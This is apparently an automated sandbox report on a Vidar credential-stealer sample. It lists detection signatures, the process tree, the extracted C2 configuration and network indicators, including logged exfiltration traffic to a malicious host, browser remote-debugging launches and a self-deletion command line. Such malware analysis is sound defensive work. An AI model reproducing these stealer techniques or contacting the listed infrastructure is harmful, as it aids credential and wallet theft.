Windows Analysis Report
ktyihkdfesf.exe

Overview

General Information

Sample name: ktyihkdfesf.exe
Analysis ID: 1578709
MD5: cc36e2a5a3c64941a79c31ca320e9797
SHA1: 50c8f5db809cfec84735c9f4dcd6b55d53dfd9f5
SHA256: 6fec179c363190199c1dcdf822be4d6b1f5c4895ebc7148a8fc9fa9512eeade8
Tags: exe, Vidar, user-lontze7
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Monitors registry run keys for changes
PE file has a writeable .text section
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ktyihkdfesf.exe (PID: 1468 cmdline: "C:\Users\user\Desktop\ktyihkdfesf.exe" MD5: CC36E2A5A3C64941A79C31CA320E9797)
    • chrome.exe (PID: 6856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 6832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2348,i,3398562599031357926,1603104178569398074,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • msedge.exe (PID: 7680 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
      • msedge.exe (PID: 6400 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2228,i,2139828529892091342,11985651726309101408,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • cmd.exe (PID: 8764 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\K6FKFCT00ZU3" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 8696 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • msedge.exe (PID: 8052 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 2168 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2996 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8356 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6600 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8368 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6744 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 8548 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7152 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 8596 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7152 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • msedge.exe (PID: 8956 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6792 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source | Rule | Description | Author | Strings
ktyihkdfesf.exe | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: ktyihkdfesf.exe PID: 1468 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
Process Memory Space: ktyihkdfesf.exe PID: 1468 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: ktyihkdfesf.exe PID: 1468 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.ktyihkdfesf.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.0.ktyihkdfesf.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

                  System Summary

                  Source: Process started, Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\ktyihkdfesf.exe", ParentImage: C:\Users\user\Desktop\ktyihkdfesf.exe, ParentProcessId: 1468, ParentProcessName: ktyihkdfesf.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 6856, ProcessName: chrome.exe
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-12-20T07:31:11.495790+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 116.203.12.114 | 443 | 192.168.2.6 | 49729 | TCP
                  2024-12-20T07:31:13.791133+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 116.203.12.114 | 443 | 192.168.2.6 | 49742 | TCP
                  2024-12-20T07:31:09.191655+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.6 | 49722 | 116.203.12.114 | 443 | TCP
                  2024-12-20T07:31:06.772119+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49716 | 116.203.12.114 | 443 | TCP

                  AV Detection

                  Source: ktyihkdfesf.exe, Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                  Source: ktyihkdfesf.exe, Virustotal: Detection: 45%
                  Source: ktyihkdfesf.exe, ReversingLabs: Detection: 55%
                  Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                  Source: ktyihkdfesf.exe, Joe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004078F0 StrStrA,lstrlenA,LocalAlloc,CryptUnprotectData,LocalAlloc,LocalFree,lstrlenA,0_2_004078F0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004116B0 CryptBinaryToStringA,HeapAlloc,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,HeapFree,GetProcessHeap,HeapFree,0_2_004116B0
                  Source: ktyihkdfesf.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknown, HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49778 version: TLS 1.0
                  Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49707 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49712 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.6:49715 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49714 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49721 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49796 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49841 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49960 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:50022 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:50061 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50103 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50154 version: TLS 1.2
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00409460 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,FindClose,0_2_00409460
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00407060 FindFirstFileA,strlen,FindFirstFileA,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004170D0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,0_2_004170D0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00401730 FindFirstFileA,FindFirstFileA,FindClose,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,FindFirstFileA,FindFirstFileA,DeleteFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_00401730
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0040A5D0 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,0_2_0040A5D0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00414BD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,lstrcatA,lstrcatA,0_2_00414BD0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00406FE0 FindFirstFileA,FindFirstFileA,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,0_2_00406FE0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0040C790 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040C790
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004081B0 ExpandEnvironmentStringsA,FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_004081B0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0040BC30 wsprintfA,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrlenA,lstrlenA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040BC30
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00415700 HeapAlloc,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,_invalid_parameter_noinfo_noreturn,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,0_2_00415700
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: chrome.exe, Memory has grown: Private usage: 1MB later: 30MB

                  Networking

                  Source: Network traffic, Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.6:49722 -> 116.203.12.114:443
                  Source: Network traffic, Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.6:49716 -> 116.203.12.114:443
                  Source: Network traffic, Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.114:443 -> 192.168.2.6:49729
                  Source: Network traffic, Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.12.114:443 -> 192.168.2.6:49742
                  Source: Malware configuration extractor, URLs: https://steamcommunity.com/profiles/76561199809363512
                  Source: global traffic, HTTP traffic detected: GET /k04ael HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
                  Source: Joe Sandbox View, IP Address: 52.178.17.2
                  Source: Joe Sandbox View, IP Address: 116.203.12.114
                  Source: Joe Sandbox View, IP Address: 149.154.167.99
                  Source: Joe Sandbox View, JA3 fingerprint: 1138de370e523e824bbca92d049a3777
                  Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknown, HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49778 version: TLS 1.0
                  Source: unknown, TCP traffic detected without corresponding DNS query: 20.198.118.190
                  Source: unknown, TCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknown, TCP traffic detected without corresponding DNS query: 20.198.119.143
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00404280 InternetOpenA,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00404280
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: frostman.shopConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239360433542_1UJC4903W7XNIUU73&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239360433543_1F4HJPO10Z3VYH0SK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239359955653_16Q8BS61PKT108CUW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239359955652_1UH15L5Z2LXM3P8PA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381681309_1UONBZH0MSLU4XT86&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381681310_13V04GE58D8UEEUDW&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239317301222_1FJU5PIOORZE0KYBN&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239317301631_1JS0AMCX251CLJ5OX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.dr String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                  Source: 000003.log6.14.dr String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                  Source: 000003.log6.14.dr String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                  Source: 000003.log6.14.dr String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                  Source: global traffic DNS traffic detected: DNS query: t.me
                  Source: global traffic DNS traffic detected: DNS query: frostman.shop
                  Source: global traffic DNS traffic detected: DNS query: www.google.com
                  Source: global traffic DNS traffic detected: DNS query: apis.google.com
                  Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
                  Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
                  Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
                  Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
                  Source: global traffic DNS traffic detected: DNS query: sb.scorecardresearch.com
                  Source: global traffic DNS traffic detected: DNS query: assets.msn.com
                  Source: unknown HTTP traffic detected:
                      POST / HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----M7YMGDTJM7G47Q16P8YU
                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                      Host: frostman.shop
                      Content-Length: 256
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                  Source: HubApps Icons.14.dr, 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
                  Source: 37ff41ba-8506-49ce-860c-105f54ae7afd.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
